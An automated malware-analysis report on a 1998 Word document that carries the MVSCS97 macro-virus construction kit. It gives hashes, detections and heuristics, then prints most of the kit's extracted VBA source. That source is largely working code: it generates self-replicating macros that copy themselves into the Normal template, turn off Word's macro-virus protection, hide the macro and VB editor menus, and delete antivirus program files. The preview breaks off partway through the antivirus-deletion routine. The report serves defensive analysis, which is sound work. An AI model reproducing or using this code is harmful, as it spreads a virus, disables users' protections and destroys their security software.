Office (OLE) malware analysis — malicious · 06982241fa8cb0ec

MALICIOUS

Office (OLE)

607.0 KB Created: 1998-04-22 03:56:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 7e8b584d2b9eb15a6cb5af0dd79f33a6 SHA-1: 5e784bdf45d5020a5471c0bd5678678d84cdd90f SHA-256: 06982241fa8cb0ec93c033101ce1e7ff3152250c05dfe32c528dc4337ecdf8ca

256 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file exhibits characteristics of a legacy WordBasic macro virus and contains VBA macros, specifically AutoOpen and Auto_Close, which are commonly used to execute malicious code upon document opening. The presence of 'MVSCS97 Word 97 Macro Virus Kit Alevirus&RickCrazy' in the script suggests it is part of a known macro virus kit. The primary function appears to be the execution of embedded malicious macros.

Heuristics 6

ClamAV: Doc.Trojan.MVSCS-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.MVSCS-1
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION

VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
Matched line in script
```
  Print #1, "  .VirusProtection = False"
```
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Auto_Close macro low OLE_VBA_AUTOCLOSE

Auto_Close macro
Matched line in script
```
  Print #1, "'AutoClose macro"
```
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS

OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	42366 bytes
SHA-256: `3263d1b53e17db9f1079d1929a19e8dc2a27d4674c681b69da2dc6d63c00bcaa`
Detection ClamAV: Doc.Trojan.MVSCS-1 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Alevirus98" Public VirusName As String Public SourceFileName As String Public NumberOfMacros As String Sub AutoOpen() On Error Resume Next Application.Caption = "MVSCS97 Word 97 Macro Virus Kit Alevirus&RickCrazy" frmStartForm.Show End Sub Sub FileTemplates() End Sub Sub ToolsCustomize() End Sub Sub FileNew() End Sub Sub EditCut() End Sub Sub EditCopy() End Sub Sub EditPaste() End Sub Sub EditPasteSpecial() End Sub Sub EditClear() End Sub Sub EditSelectAll() End Sub Sub EditFind() End Sub Sub EditReplace() End Sub Sub EditGoTo() End Sub Sub ToolsOptions() End Sub Sub InsertObject() End Sub Sub InsertFile() End Sub Sub InsertHyperlink() End Sub Sub InsertCaption() End Sub Sub InsertFootNote() End Sub Sub InsertBreak() End Sub Sub TableSort() End Sub Sub TableFormula() End Sub Sub FilePrint() End Sub Sub FilePrintPreview() End Sub Sub FileVersions() End Sub Sub FileProperties() End Sub Sub ToolsWordCount() End Sub Sub ToolsMacro() End Sub Sub ViewVBCode() End Sub Attribute VB_Name = "frmStartForm" Attribute VB_Base = "0{E060CCC5-D97B-11D1-BE00-444553540000}{E060CC62-D97B-11D1-BE00-444553540000}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub cmdOK_Click() frmStartForm.Hide frmVirusSourceName.Show End Sub Private Sub Image1_Click() End Sub Private Sub Label1_Click() End Sub Private Sub SpinButton1_Change() End Sub Private Sub UserForm_Click() End Sub Attribute VB_Name = "frmVirusSourceName" Attribute VB_Base = "0{E060CC8C-D97B-11D1-BE00-444553540000}{E060CC6A-D97B-11D1-BE00-444553540000}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub cmdOK_Click() On Error GoTo VaCa If txtVirusName.Text = "" Then MsgBox "Coloque um nome para seu Virus!!!.", vbOKOnly, "MVSCS97" txtboxnotfilled = 1 End If If txtSourceFileName.Text = "" Then MsgBox "Coloque um nome para o Fonte!!!.", vbOKOnly, "MVSCS97" txtboxnotfilled = 1 End If If opttxt.Value = False And optBAS.Value = False Then MsgBox "Escolha a extenção do Arquivo .TXT ou .BAS???", vbOKOnly, "MVSCS97" txtboxnotfilled = 1 End If If txtboxnotfilled = 1 Then GoTo VaCa If opttxt.Value = True Then txtSourceFileName = txtSourceFileName & ".txt" End If If optBAS.Value = True Then txtSourceFileName = txtSourceFileName & ".bas" End If VirusName = txtVirusName.Text SourceFileName = txtSourceFileName.Text frmVirusSourceName.Hide frmVirusBody.Show VaCa: End Sub Private Sub Frame1_Click() End Sub Private Sub txtSourceFileName_Change() End Sub Private Sub txtVirusName_Change() End Sub Private Sub UserForm_Click() End Sub Attribute VB_Name = "frmVirusBody" Attribute VB_Base = "0{E060CC90-D97B-11D1-BE00-444553540000}{E060CC6C-D97B-11D1-BE00-444553540000}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub CommandButton1_Click() On Error GoTo ByeBye If chkbStealth.Value = True Then frmStealth.Show End If If chkbRetro.Value = True Then frmRetro.Show End If If chkbPayload.Value = True Then frmPayload.Show End If frmVirusBody.Hide frmMacros.Show ByeBye: End Sub Private Sub UserForm_Initialize() On Error GoTo ByeBye lblVirusName = VirusName lblSourceFileName = SourceFileName ByeBye: End Sub Attribute VB_Name = "frmStealth" Attribute VB_Base = "0{E060CC94-D97B-11D1-BE00-444553540000}{E060CC6E-D97B-11D1-BE00-444553540000}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub cmdOK_Click() frmStealth.Hide End Sub Private Sub UserForm_Click() End Sub Private Sub UserForm_MouseMove(ByVal Button As Integer, ByVal Shift As Integer, ByVal X As Single, ByVal Y As Single) End Sub Attribute VB_Name = "frmRetro" Attribute VB_Base = "0{E060CC98-D97B-11D1-BE00-444553540000}{E060CC70-D97B-11D1-BE00-444553540000}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub CheckBox1_Click() End Sub Private Sub chkbPCCillan95_Click() End Sub Private Sub cmdOK_Click() frmRetro.Hide End Sub Private Sub UserForm_Click() End Sub Attribute VB_Name = "frmMakeVirus" Attribute VB_Base = "0{E060CCBC-D97B-11D1-BE00-444553540000}{E060CC82-D97B-11D1-BE00-444553540000}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub cmdExit_Click() On Error Resume Next Tasks.ExitWindows End Sub Private Sub cmdMAKE_Click() On Error GoTo ByeBye Open SourceFileName For Output As #1 Print #1, "'Por favor não tire a legenda!" Print #1, "'Gerado por MVSCS97 Word 97 Macro Virus KIT 1998!" Print #1, "'AlevirusS>C>S 1998 Isto é para todos os Virus Makers do Brasil!" Print #1, "'Virus Nome: " & VirusName Print #1, If frmMacros.chkbAutoOpen = True Then Print #1, Print #1, "'------------------------------------------------------------" Print #1, "'AutoOpen macro" Print #1, "'Executa quando o documento for Aberto" Print #1, "'------------------------------------------------------------" Print #1, "Attribute VB_Name = """ & VirusName & """" Print #1, "Sub AutoOpen()" Print #1, " On Error Resume Next" Print #1, If frmPayload.chkbAssistant = True Or frmPayload.chkbBeep = True Or frmPayload.chkbCaption = True Or frmPayload.chkbChangeStatusBar = True Or frmPayload.chkbExitWindows = True Or frmPayload.chkbMessageBox = True Or frmPayload.chkbPassword = True Then Print #1, " Payload" Print #1, End If Print #1, "With Options" Print #1, " .ConfirmConversions = False" Print #1, " .VirusProtection = False" Print #1, " .SaveNormalPrompt = False" Print #1, " End With" Print #1, " ActiveDocument.ReadOnlyRecommended = False" Print #1, " n343091879 = 0" Print #1, Print #1, " set Unit187918734301 = MacroContainer" Print #1, " If Unit187918734301 = NormalTemplate Then n343091879 = 1" Print #1, Print #1, " If n343091879 = 1 Then r4g34304 = NormalTemplate.FullName Else r4g34304 = ActiveDocument.FullName" Print #1, " If n343091879 = 1 Then ki91879 = ActiveDocument.FullName Else ki91879 = NormalTemplate.FullName" Print #1, " Application.OrganizerCopy Source:=r4g34304, Destination:=ki91879, Name:=""" & VirusName & """, Object:=wdOrganizerObjectProjectItems" Print #1, " If n343091879 = 1 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument" Print #1, " If n343091879 = 0 Then" Print #1, Print #1, " If NormalTemplate.Saved = False Then NormalTemplate.Save" Print #1, " End If" If frmRetro.chkbEliaShim Or frmRetro.chkbCHICO Or frmRetro.chkbAVP Or frmRetro.chkbFMacro Or frmRetro.chkbFProt95 Or frmRetro.chkbMcAfee Or frmRetro.chkbNorton Or frmRetro.chkbPCCillan95 Or frmRetro.chkbPCCillan97 Or frmRetro.chkbTBAV = True Then Print #1, " Retro" Print #1, End If Print #1, "End Sub" Print #1, End If If frmMacros.chkbAutoClose = True Then Print #1, Print #1, "'------------------------------------------------------------" Print #1, "'AutoClose macro" Print #1, "'Executa quando o documento for fechado" Print #1, "'------------------------------------------------------------" Print #1, "Attribute VB_Name = """ & VirusName & """" Print #1, "Sub AutoClose()" Print #1, " On Error Resume Next" Print #1, If frmPayload.chkbAssistant = True Or frmPayload.chkbBeep = True Or frmPayload.chkbCaption = True Or frmPayload.chkbChangeStatusBar = True Or frmPayload.chkbExitWindows = True Or frmPayload.chkbMessageBox = True Or frmPayload.chkbPassword = True Then Print #1, " Payload" Print #1, End If Print #1, "With Options" Print #1, " .ConfirmConversions = False" Print #1, " .VirusProtection = False" Print #1, " .SaveNormalPrompt = False" Print #1, " End With" Print #1, " ActiveDocument.ReadOnlyRecommended = False" Print #1, " n343091879 = 0" Print #1, Print #1, " set Unit187918734301 = MacroContainer" Print #1, " If Unit187918734301 = NormalTemplate Then n343091879 = 1" Print #1, Print #1, " If n343091879 = 1 Then r4g34304 = NormalTemplate.FullName Else r4g34304 = ActiveDocument.FullName" Print #1, " If n343091879 = 1 Then ki91879 = ActiveDocument.FullName Else ki91879 = NormalTemplate.FullName" Print #1, " Application.OrganizerCopy Source:=r4g34304, Destination:=ki91879, Name:=""" & VirusName & """, Object:=wdOrganizerObjectProjectItems" Print #1, " If n343091879 = 1 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument" Print #1, " If n343091879 = 0 Then" Print #1, Print #1, " If NormalTemplate.Saved = False Then NormalTemplate.Save" Print #1, " End If" If frmRetro.chkbEliaShim Or frmRetro.chkbCHICO Or frmRetro.chkbAVP Or frmRetro.chkbFMacro Or frmRetro.chkbFProt95 Or frmRetro.chkbMcAfee Or frmRetro.chkbNorton Or frmRetro.chkbPCCillan95 Or frmRetro.chkbPCCillan97 Or frmRetro.chkbTBAV = True Then Print #1, " Retro" Print #1, End If Print #1, "End Sub" Print #1, End If If frmMacros.chkbFileSaveAs = True Then Print #1, Print #1, "'-----------------------------------------------------------------------" Print #1, "'ArquivoSalvarComo macro" Print #1, "'Executa quando o usuario selecionar Arquivo Salvar Como no Menu do Word" Print #1, "'-----------------------------------------------------------------------" Print #1, "Attribute VB_Name = """ & VirusName & """" Print #1, "Sub FileSaveAs()" Print #1, Print #1, " Dialogs(wdDialogFileSaveAs).Show" Print #1, Print #1, " On Error Resume Next" Print #1, If frmPayload.chkbAssistant = True Or frmPayload.chkbBeep = True Or frmPayload.chkbCaption = True Or frmPayload.chkbChangeStatusBar = True Or frmPayload.chkbExitWindows = True Or frmPayload.chkbMessageBox = True Or frmPayload.chkbPassword = True Then Print #1, " Payload" Print #1, End If Print #1, "With Options" Print #1, " .ConfirmConversions = False" Print #1, " .VirusProtection = False" Print #1, " .SaveNormalPrompt = False" Print #1, " End With" Print #1, " ActiveDocument.ReadOnlyRecommended = False" Print #1, " n343091879 = 0" Print #1, Print #1, " set Unit187918734301 = MacroContainer" Print #1, " If Unit187918734301 = NormalTemplate Then n343091879 = 1" Print #1, Print #1, " If n343091879 = 1 Then r4g34304 = NormalTemplate.FullName Else r4g34304 = ActiveDocument.FullName" Print #1, " If n343091879 = 1 Then ki91879 = ActiveDocument.FullName Else ki91879 = NormalTemplate.FullName" Print #1, " Application.OrganizerCopy Source:=r4g34304, Destination:=ki91879, Name:=""" & VirusName & """, Object:=wdOrganizerObjectProjectItems" Print #1, " If n343091879 = 1 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument" Print #1, " If n343091879 = 0 Then" Print #1, Print #1, " If NormalTemplate.Saved = False Then NormalTemplate.Save" Print #1, " End If" If frmRetro.chkbEliaShim Or frmRetro.chkbCHICO Or frmRetro.chkbAVP Or frmRetro.chkbFMacro Or frmRetro.chkbFProt95 Or frmRetro.chkbMcAfee Or frmRetro.chkbNorton Or frmRetro.chkbPCCillan95 Or frmRetro.chkbPCCillan97 Or frmRetro.chkbTBAV = True Then Print #1, " Retro" Print #1, End If Print #1, "End Sub" Print #1, End If If frmMacros.chkbFileSave = True Then Print #1, Print #1, "'-------------------------------------------------------------------" Print #1, "'ArquivoSalvar macro" Print #1, "'Executa quando o usuario selecionar Arquivo Salvar no Menu do Word " Print #1, "'-------------------------------------------------------------------" Print #1, "Attribute VB_Name = """ & VirusName & """" Print #1, "Sub FileSave()" Print #1, Print #1, " ActiveDocument.Save" Print #1, Print #1, " On Error Resume Next" Print #1, If frmPayload.chkbAssistant = True Or frmPayload.chkbBeep = True Or frmPayload.chkbCaption = True Or frmPayload.chkbChangeStatusBar = True Or frmPayload.chkbExitWindows = True Or frmPayload.chkbMessageBox = True Or frmPayload.chkbPassword = True Then Print #1, " Payload" Print #1, End If Print #1, "With Options" Print #1, " .ConfirmConversions = False" Print #1, " .VirusProtection = False" Print #1, " .SaveNormalPrompt = False" Print #1, " End With" Print #1, " ActiveDocument.ReadOnlyRecommended = False" Print #1, " n343091879 = 0" Print #1, Print #1, " set Unit187918734301 = MacroContainer" Print #1, " If Unit187918734301 = NormalTemplate Then n343091879 = 1" Print #1, Print #1, " If n343091879 = 1 Then r4g34304 = NormalTemplate.FullName Else r4g34304 = ActiveDocument.FullName" Print #1, " If n343091879 = 1 Then ki91879 = ActiveDocument.FullName Else ki91879 = NormalTemplate.FullName" Print #1, " Application.OrganizerCopy Source:=r4g34304, Destination:=ki91879, Name:=""" & VirusName & """, Object:=wdOrganizerObjectProjectItems" Print #1, " If n343091879 = 1 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument" Print #1, " If n343091879 = 0 Then" Print #1, Print #1, " If NormalTemplate.Saved = False Then NormalTemplate.Save" Print #1, " End If" If frmRetro.chkbEliaShim Or frmRetro.chkbCHICO Or frmRetro.chkbAVP Or frmRetro.chkbFMacro Or frmRetro.chkbFProt95 Or frmRetro.chkbMcAfee Or frmRetro.chkbNorton Or frmRetro.chkbPCCillan95 Or frmRetro.chkbPCCillan97 Or frmRetro.chkbTBAV = True Then Print #1, " Retro" Print #1, End If Print #1, "End Sub" Print #1, End If If frmMacros.chkbFilePrint = True Then Print #1, Print #1, "'---------------------------------------------------------------------" Print #1, "'ArquivoImprimir macro" Print #1, "'Executa quando o usuario selecionar Arquivo Imprimir no Menu do Word" Print #1, "'---------------------------------------------------------------------" Print #1, "Attribute VB_Name = """ & VirusName & """" Print #1, "Sub FilePrint()" Print #1, Print #1, " Dialogs(wdDialogFilePrint).Show" Print #1, Print #1, " On Error Resume Next" Print #1, If frmPayload.chkbAssistant = True Or frmPayload.chkbBeep = True Or frmPayload.chkbCaption = True Or frmPayload.chkbChangeStatusBar = True Or frmPayload.chkbExitWindows = True Or frmPayload.chkbMessageBox = True Or frmPayload.chkbPassword = True Then Print #1, " Payload" Print #1, End If Print #1, "With Options" Print #1, " .ConfirmConversions = False" Print #1, " .VirusProtection = False" Print #1, " .SaveNormalPrompt = False" Print #1, " End With" Print #1, " ActiveDocument.ReadOnlyRecommended = False" Print #1, " n343091879 = 0" Print #1, Print #1, " set Unit187918734301 = MacroContainer" Print #1, " If Unit187918734301 = NormalTemplate Then n343091879 = 1" Print #1, Print #1, " If n343091879 = 1 Then r4g34304 = NormalTemplate.FullName Else r4g34304 = ActiveDocument.FullName" Print #1, " If n343091879 = 1 Then ki91879 = ActiveDocument.FullName Else ki91879 = NormalTemplate.FullName" Print #1, " Application.OrganizerCopy Source:=r4g34304, Destination:=ki91879, Name:=""" & VirusName & """, Object:=wdOrganizerObjectProjectItems" Print #1, " If n343091879 = 1 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument" Print #1, " If n343091879 = 0 Then" Print #1, Print #1, " If NormalTemplate.Saved = False Then NormalTemplate.Save" Print #1, " End If" If frmRetro.chkbEliaShim Or frmRetro.chkbCHICO Or frmRetro.chkbAVP Or frmRetro.chkbFMacro Or frmRetro.chkbFProt95 Or frmRetro.chkbMcAfee Or frmRetro.chkbNorton Or frmRetro.chkbPCCillan95 Or frmRetro.chkbPCCillan97 Or frmRetro.chkbTBAV = True Then Print #1, " Retro" Print #1, End If Print #1, "End Sub" Print #1, End If If frmMacros.chkbEditFind = True Then Print #1, Print #1, "'--------------------------------------------------------------------" Print #1, "'EditarLocalizar macro" Print #1, "'Executa quando o usuario selecionar Editar Localizar no Menu do Word" Print #1, "'--------------------------------------------------------------------" Print #1, "Attribute VB_Name = """ & VirusName & """" Print #1, "Sub EditFind()" Print #1, Print #1, " Dialogs(wdDialogEditFind).Show" Print #1, Print #1, " On Error Resume Next" Print #1, If frmPayload.chkbAssistant = True Or frmPayload.chkbBeep = True Or frmPayload.chkbCaption = True Or frmPayload.chkbChangeStatusBar = True Or frmPayload.chkbExitWindows = True Or frmPayload.chkbMessageBox = True Or frmPayload.chkbPassword = True Then Print #1, " Payload" Print #1, End If Print #1, "With Options" Print #1, " .ConfirmConversions = False" Print #1, " .VirusProtection = False" Print #1, " .SaveNormalPrompt = False" Print #1, " End With" Print #1, " ActiveDocument.ReadOnlyRecommended = False" Print #1, " n343091879 = 0" Print #1, Print #1, " set Unit187918734301 = MacroContainer" Print #1, " If Unit187918734301 = NormalTemplate Then n343091879 = 1" Print #1, Print #1, " If n343091879 = 1 Then r4g34304 = NormalTemplate.FullName Else r4g34304 = ActiveDocument.FullName" Print #1, " If n343091879 = 1 Then ki91879 = ActiveDocument.FullName Else ki91879 = NormalTemplate.FullName" Print #1, " Application.OrganizerCopy Source:=r4g34304, Destination:=ki91879, Name:=""" & VirusName & """, Object:=wdOrganizerObjectProjectItems" Print #1, " If n343091879 = 1 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument" Print #1, " If n343091879 = 0 Then" Print #1, Print #1, " If NormalTemplate.Saved = False Then NormalTemplate.Save" Print #1, " End If" If frmRetro.chkbEliaShim Or frmRetro.chkbCHICO Or frmRetro.chkbAVP Or frmRetro.chkbFMacro Or frmRetro.chkbFProt95 Or frmRetro.chkbMcAfee Or frmRetro.chkbNorton Or frmRetro.chkbPCCillan95 Or frmRetro.chkbPCCillan97 Or frmRetro.chkbTBAV = True Then Print #1, " Retro" Print #1, End If Print #1, "End Sub" Print #1, End If If frmMacros.chkbToolsWordCount = True Then Print #1, Print #1, "'--------------------------------------------------------------------------------" Print #1, "'FerramantasContarPalavras macro" Print #1, "'Executa quando o usuario selecionar FerramantasContarPalavras no Menu do Word" Print #1, "'--------------------------------------------------------------------------------" Print #1, "Attribute VB_Name = """ & VirusName & """" Print #1, "Sub ToolsWordCount()" Print #1, Print #1, " Dialogs(wdDialogToolsWordCount).Show" Print #1, Print #1, " On Error Resume Next" Print #1, If frmPayload.chkbAssistant = True Or frmPayload.chkbBeep = True Or frmPayload.chkbCaption = True Or frmPayload.chkbChangeStatusBar = True Or frmPayload.chkbExitWindows = True Or frmPayload.chkbMessageBox = True Or frmPayload.chkbPassword = True Then Print #1, " Payload" Print #1, End If Print #1, "With Options" Print #1, " .ConfirmConversions = False" Print #1, " .VirusProtection = False" Print #1, " .SaveNormalPrompt = False" Print #1, " End With" Print #1, " ActiveDocument.ReadOnlyRecommended = False" Print #1, " n343091879 = 0" Print #1, Print #1, " set Unit187918734301 = MacroContainer" Print #1, " If Unit187918734301 = NormalTemplate Then n343091879 = 1" Print #1, Print #1, " If n343091879 = 1 Then r4g34304 = NormalTemplate.FullName Else r4g34304 = ActiveDocument.FullName" Print #1, " If n343091879 = 1 Then ki91879 = ActiveDocument.FullName Else ki91879 = NormalTemplate.FullName" Print #1, " Application.OrganizerCopy Source:=r4g34304, Destination:=ki91879, Name:=""" & VirusName & """, Object:=wdOrganizerObjectProjectItems" Print #1, " If n343091879 = 1 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument" Print #1, " If n343091879 = 0 Then" Print #1, Print #1, " If NormalTemplate.Saved = False Then NormalTemplate.Save" Print #1, " End If" If frmRetro.chkbEliaShim Or frmRetro.chkbCHICO Or frmRetro.chkbAVP Or frmRetro.chkbFMacro Or frmRetro.chkbFProt95 Or frmRetro.chkbMcAfee Or frmRetro.chkbNorton Or frmRetro.chkbPCCillan95 Or frmRetro.chkbPCCillan97 Or frmRetro.chkbTBAV = True Then Print #1, " Retro" Print #1, End If Print #1, "End Sub" Print #1, End If If frmMacros.chkbAutoExit = True Then Print #1, Print #1, "'---------------------------------------------------------------------------------" Print #1, "'AutoExit macro" Print #1, "'Executa Automaticamente quando o usuario sai do Word" Print #1, "'---------------------------------------------------------------------------------" Print #1, "Attribute VB_Name = """ & VirusName & """" Print #1, "Sub AutoExit()" Print #1, Print #1, " On Error Resume Next" Print #1, If frmPayload.chkbAssistant = True Or frmPayload.chkbBeep = True Or frmPayload.chkbCaption = True Or frmPayload.chkbChangeStatusBar = True Or frmPayload.chkbExitWindows = True Or frmPayload.chkbMessageBox = True Or frmPayload.chkbPassword = True Then Print #1, " Payload" Print #1, End If Print #1, "With Options" Print #1, " .ConfirmConversions = False" Print #1, " .VirusProtection = False" Print #1, " .SaveNormalPrompt = False" Print #1, " End With" Print #1, " ActiveDocument.ReadOnlyRecommended = False" Print #1, " n343091879 = 0" Print #1, Print #1, " set Unit187918734301 = MacroContainer" Print #1, " If Unit187918734301 = NormalTemplate Then n343091879 = 1" Print #1, Print #1, " If n343091879 = 1 Then r4g34304 = NormalTemplate.FullName Else r4g34304 = ActiveDocument.FullName" Print #1, " If n343091879 = 1 Then ki91879 = ActiveDocument.FullName Else ki91879 = NormalTemplate.FullName" Print #1, " Application.OrganizerCopy Source:=r4g34304, Destination:=ki91879, Name:=""" & VirusName & """, Object:=wdOrganizerObjectProjectItems" Print #1, " If n343091879 = 1 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument" Print #1, " If n343091879 = 0 Then" Print #1, Print #1, " If NormalTemplate.Saved = False Then NormalTemplate.Save" Print #1, " End If" If frmRetro.chkbEliaShim Or frmRetro.chkbCHICO Or frmRetro.chkbAVP Or frmRetro.chkbFMacro Or frmRetro.chkbFProt95 Or frmRetro.chkbMcAfee Or frmRetro.chkbNorton Or frmRetro.chkbPCCillan95 Or frmRetro.chkbPCCillan97 Or frmRetro.chkbTBAV = True Then Print #1, " Retro" Print #1, End If Print #1, "End Sub" Print #1, End If If frmMacros.chkbFileNew = True Then Print #1, Print #1, "'------------------------------------------------------------------" Print #1, "'ArquivoNovo macro" Print #1, "'Executa quando o usuario selecionar Arequivo Novo no Menu do Word" Print #1, "'------------------------------------------------------------------" Print #1, "Attribute VB_Name = """ & VirusName & """" Print #1, "Sub PuTa()" Print #1, Print #1, " On Error Resume Next" Print #1, If frmPayload.chkbAssistant = True Or frmPayload.chkbBeep = True Or frmPayload.chkbCaption = True Or frmPayload.chkbChangeStatusBar = True Or frmPayload.chkbExitWindows = True Or frmPayload.chkbMessageBox = True Or frmPayload.chkbPassword = True Then Print #1, " Payload" Print #1, End If Print #1, "With Options" Print #1, " .ConfirmConversions = False" Print #1, " .VirusProtection = False" Print #1, " .SaveNormalPrompt = False" Print #1, " End With" Print #1, " ActiveDocument.ReadOnlyRecommended = False" Print #1, " n343091879 = 0" Print #1, Print #1, " set Unit187918734301 = MacroContainer" Print #1, " If Unit187918734301 = NormalTemplate Then n343091879 = 1" Print #1, Print #1, " If n343091879 = 1 Then r4g34304 = NormalTemplate.FullName Else r4g34304 = ActiveDocument.FullName" Print #1, " If n343091879 = 1 Then ki91879 = ActiveDocument.FullName Else ki91879 = NormalTemplate.FullName" Print #1, " Application.OrganizerCopy Source:=r4g34304, Destination:=ki91879, Name:=""" & VirusName & """, Object:=wdOrganizerObjectProjectItems" Print #1, " If n343091879 = 1 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument" Print #1, " If n343091879 = 0 Then" Print #1, Print #1, " If NormalTemplate.Saved = False Then NormalTemplate.Save" Print #1, " End If" If frmRetro.chkbEliaShim Or frmRetro.chkbCHICO Or frmRetro.chkbAVP Or frmRetro.chkbFMacro Or frmRetro.chkbFProt95 Or frmRetro.chkbMcAfee Or frmRetro.chkbNorton Or frmRetro.chkbPCCillan95 Or frmRetro.chkbPCCillan97 Or frmRetro.chkbTBAV = True Then Print #1, " Retro" Print #1, End If Print #1, "End Sub" Print #1, Print #1, "Sub FileNew()" Print #1, "On Error Resume Next" Print #1, "Call PuTa" Print #1, "Dialogs(wdDialogFileNew).Show" Print #1, "Skip = 1" Print #1, "Call PuTa" Print #1, "End Sub" End If If frmStealth.chkbToolsMacro = True Then Print #1, Print #1, "'------------------------------------------------------------" Print #1, "'FerramentasMacro macro" Print #1, "'Usado para esconder Caixa de Ferramentas Macro" Print #1, "'------------------------------------------------------------" Print #1, "Sub ToolsMacro()" Print #1, Print #1, "End Sub" Print #1, End If If frmStealth.chkbViewVBCode = True Then Print #1, Print #1, "'------------------------------------------------------------" Print #1, "'VisualBasicCodigo macro" Print #1, "'Usado para esconder a Caixa do VisualBasic " Print #1, "'------------------------------------------------------------" Print #1, "Sub ViewVBCode()" Print #1, Print #1, "End Sub" Print #1, End If If frmStealth.chkbToolsCustomize = True Then Print #1, Print #1, "'------------------------------------------------------------" Print #1, "'FerramentasPersonalizar macro" Print #1, "'Usado para esconder a Caixa Ferramentas Personalizar " Print #1, "'------------------------------------------------------------" Print #1, "Sub ToolsCustomize()" Print #1, Print #1, "End Sub" Print #1, End If If frmStealth.chkbFileTemplates = True Then Print #1, Print #1, "'------------------------------------------------------------" Print #1, "'ArquivoModelos macro" Print #1, "'Usado para esconder a caixa de Dialogo Arwquivos Modelo " Print #1, "'------------------------------------------------------------" Print #1, "Sub FileTemplates()" Print #1, Print #1, "End Sub" Print #1, End If If frmRetro.chkbEliaShim Or frmRetro.chkbCHICO Or frmRetro.chkbAVP Or frmRetro.chkbFMacro Or frmRetro.chkbFProt95 Or frmRetro.chkbMcAfee Or frmRetro.chkbNorton Or frmRetro.chkbPCCillan95 Or frmRetro.chkbPCCillan97 Or frmRetro.chkbTBAV = True Then Print #1, Print #1, "'------------------------------------------------------------" Print #1, "'Retro macro" Print #1, "'Deleta varios Anti-Virus Muito Populares" Print #1, "'------------------------------------------------------------" Print #1, "Sub Retro()" Print #1, " On Error Resume Next" End If If frmRetro.chkbAVP = True Then Print #1, " Kill ""C:\Program Files\AntiViral Toolkit Pro\Avp32.exe""" Print #1, " Kill ""C:\progra~1\Antivi~1\Avp32.exe""" Print #1, " Kill ""C:\Program Files\AntiViral Toolkit Pro\.avc""" Print #1, " Kill ""C:\progra~1\antivi~1\.avc""" End If If frmRetro.chkbFMacro = True Then Print #1, " Kill ""C:\f-macro\f-macro.exe""" Print #1, " Kill ""C:\f-prot~1\f-macro.exe""" End If If frmRetro.chkbFProt95 = True Then Print #1, " Kill ""C:\Program Files\Command Software\F-PROT95\Sign.def""" Print #1, " Kill ""C:\progra~1\comman~1\f-prot95\sign.def""" Print #1, " Kill ""C:\Program Files\Command Software\F-PROT95\Dvp.vxd""" Print #1, " Kill ""C:\progra~1\comman~1\f-prot95\dvp.vxd""" End If If frmRetro.chkbMcAfee = True Then Print #1, " Kill ""C:\Program Files\McAfee\VirusScan95\Scan.dat""" Print #1, " Kill ""C:\progra~1\mcafee\viruss~1\scan.dat""" Print #1, " Kill ""C:\Program Files\McAfee\VirusScan95\Mcscan32.dll""" Print #1, " Kill ""C:\progra~1\mcafee\viruss~1\mcscan32.dll""" Print #1, " Kill ""C:\Program Files\McAfee\VirusScan\Scan.dat""" Print #1, " Kill ""C:\Program Files\McAfee\VirusScan\Mcscan32.dll""" End If If frmRetro.chkbNorton = True Then Print #1, " Kill ""C:\Program Files\Norton AntiVirus\Viruscan.dat""" Print #1, " Kill ""C:\progra~1\norton~1\viruscan.dat""" Print #1, " Kill ""C:\Program 